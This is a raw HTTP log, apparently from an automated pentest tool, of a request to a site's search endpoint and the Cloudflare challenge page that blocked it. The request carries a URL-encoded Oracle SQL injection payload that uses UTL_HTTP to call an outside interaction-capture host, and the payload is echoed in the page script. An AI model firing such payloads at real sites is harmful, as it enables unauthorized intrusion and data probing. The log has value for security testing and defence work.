REQUEST:
GET https://my.myfirst.tech/search?username=%27%20%7C%7C%20%28SELECT%20UTL_HTTP.REQUEST%28%27http%3A%2F%2Fh0cqg45t8jh21623dc0zto0stc8yb1pxl.oast.fun%2F%27%29%20FROM%20dual%29%20%7C%7C%20%27
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:19 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9799
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8475fedb3a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=s46LuQDAHg70Yhrwz%2BDK11qkOCQdoIUa788VTswMZ8gRYwvBbs3jAV%2BmkbUSY1lukxZA0BH2lM6Fa2vAPDT3PUmK9Utdf3V5pB1kBOI8jNdnjDP9wSP1586A6r25oVNX%2F3BGTvCseCaoo77vuw%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8475fedb3a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'ALRhUOf4v7P3uEqEwt9MHSx_e2aJHSa.muS.ysp7vBg-1784281159-1.2.1.1-XhX7cONVTeGG1IFeE7fuFJPtSgGHUAnG2Ei6ioE2gjV34wAunfPLJ6MwU28gqRjK',cITimeS: '1784281159',cRay: 'a1c8475fedb3a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?username=%27+%7C%7C+%28SELECT+UTL_HTTP.REQUEST%28%27http%3A%2F%2Fh0cqg45t8jh21623dc0zto0stc8yb1pxl.oast.fun%2F%27%29+FROM+dual%29+%7C%7C+%27\u0026__cf_chl_tk=Psprak0vcJdewg8mKEJPh2wmjemet3ovwUPGiQsekUI-1784281159-1.0.1.1-p9hl.g98BsJiJOQaw5BiaTUyvnF8gOO46W.CX.rq970",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?username=%27+%7C%7C+%28SELECT+UTL_HTTP.REQUEST%28%27http%3A%2F%2Fh0cqg45t8jh21623dc0zto0stc8yb1pxl.oast.fun%2F%27%29+FROM+dual%29+%7C%7C+%27\u0026__cf_chl_f_tk=Psprak0vcJdewg8mKEJPh2wmjemet3ovwUPGiQsekUI-1784281159-1.0.1.1-p9hl.g98BsJiJOQaw5BiaTUyvnF8gOO46W.CX.rq970",md: 'A0iDhwsP_kynubbx_O_XNiA2Gcd6gVTvLo5C7dbnyNA-1784281159-1.2.1.1-jA94Nyu59xyMj22Avyp_z7Ch_rep3E0e6y2ZxuobFIsoIilIWVB10iVaHAc_AJke18APJg_xP0dvPyVfyvJOO6iMb2t29jOhhFTJVyPTxa3ZGxJeiU_DLl._tMRHSB_TvMZf48LKzUcKUVlThcUgMqlfjDrzm0UfGc26tD5UGyeDxlT16dh3.xGD6EHbXpzZo1TvzQHWML5q9syLf8kds.CjWmFG2LmeAf4QTtfJGn5QJN1sUoPNlvo2CqtgfFNr2owEA117lOUDBwAhZg_echFfIa0PJ1LqPGIwG.o9vgUoPRo0wx52LbccgF4K.vgtYqsfmPnHtgpiVGyT4MwY2lsKu4.y3koX9TFtEoYQcPXR_YvrQ8zKlQt2HPwxg0jExyKT1NDz9oYrkDjxMfTvwWaWfu3SE3aKbdihUhBKRiaJdemixNNiQ4Kt8CPBr2k5V18hmYZD_3zhVgAAGMDYaZIkJ8AOGRSSY_2zqvp_3l.fJ5.YqxMr3ZupfwCYQi8WtIgbwmG.YFIEjDsyUd13ORmnfe8AoU2jKOI.2fEIW2qEnF04uB8HesvNud_WO35cP0JYoApSLc1ZhEx5OxoXjbzgfn.FPLPt1PCiWKL_js97GK3Y_kPxRDLUxF85wlqvHpHtQ21dFr0JhcrfSEAIkMmXQm6yHUnO6gImt09Jhe4QU07rspUPHsBTK01g4YbWdaRd7ZMBlPmPSbt_ysP80AJ22dAkz2lcxfLMplDzfmDFlt3x3mhHb8feEGJmeuWzvFAt11lYoTOPAKVI870310foeQ.CghPmxZjPRsfN_LSy2szzOkC99GN3APNj9vsJwwvbq7cJ6NvzX7nvfc0ewMYG7s41sUK8MvkSkQJS2BPOFe2sDonlvsNTayCq7j.rpj2ZrV0.Xi0dpBpOIzKF3f8CGkwOEmrxK4mE5lXqwXbuQfZv891hp0ApKFB5qrk6lbwWSAmgt00_O_7uiELJbk0hlh8Qnttgr9TE2qG7QBTwClKmNyA_A5i0TIIe3SZ_UFK0plogpDdf4D4VObuI0KbXWB.i4rzrWfzGx6TPXekgaaxMm7dZgrn2bt_dqvIsHsjF.o5tAe_i.wvztpMA.C_ndlaWbrdrCkv9gS.P8VWUDPype.DDYueMKgpvK8Yv5Gomg7TDEE3t6f6oJplUgsGuLLT74DSmIH_br_FZ8cCUiyRftoH5I_bouTUp37nZse698DAiX6vITHZGCq1lKmb7rkfYuYdZ4.51ReDYG_fbxEs2OF_IZkm_bQ2OAqXWmkiw_j5JRh8mYNAX1e9yMdB_ULyDysGjWuIWoYkHVHwlcY2BInTtCJgYLR.tjvGz',mdrd: 'ADDaonuADh6ddVyyYQsehCDtuKf5EYI8P4uI6QvxpLI-1784281159-1.2.1.1-swtJfTIo9ACsmvOSsaqWRSpSo1cfVJbQujNcs3IxqKB4NdVUJVRyUmPt5vDPNKS5xmVN3ts.aotenvzFQDcUQuGYUK.Pfwfwrvq1v0kK50mieW7ux0LbFlO4ni.YdrQEiGYPhHz2LVZNL9lKEILVhKEBQ0v.kLD34oNQ2BfDjGT2E80B_QmaANX6KWhTtg5ODZjNXjpiTNjmCYO_d.BrWxoM.BHQq7SxWbvxZut.HX0YijALxUOiPyf6kwD8T7EI',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8475fedb3a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?username=%27+%7C%7C+%28SELECT+UTL_HTTP.REQUEST%28%27http%3A%2F%2Fh0cqg45t8jh21623dc0zto0stc8yb1pxl.oast.fun%2F%27%29+FROM+dual%29+%7C%7C+%27\u0026__cf_chl_rt_tk=Psprak0vcJdewg8mKEJPh2wmjemet3ovwUPGiQsekUI-1784281159-1.0.1.1-p9hl.g98BsJiJOQaw5BiaTUyvnF8gOO46W.CX.rq970"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
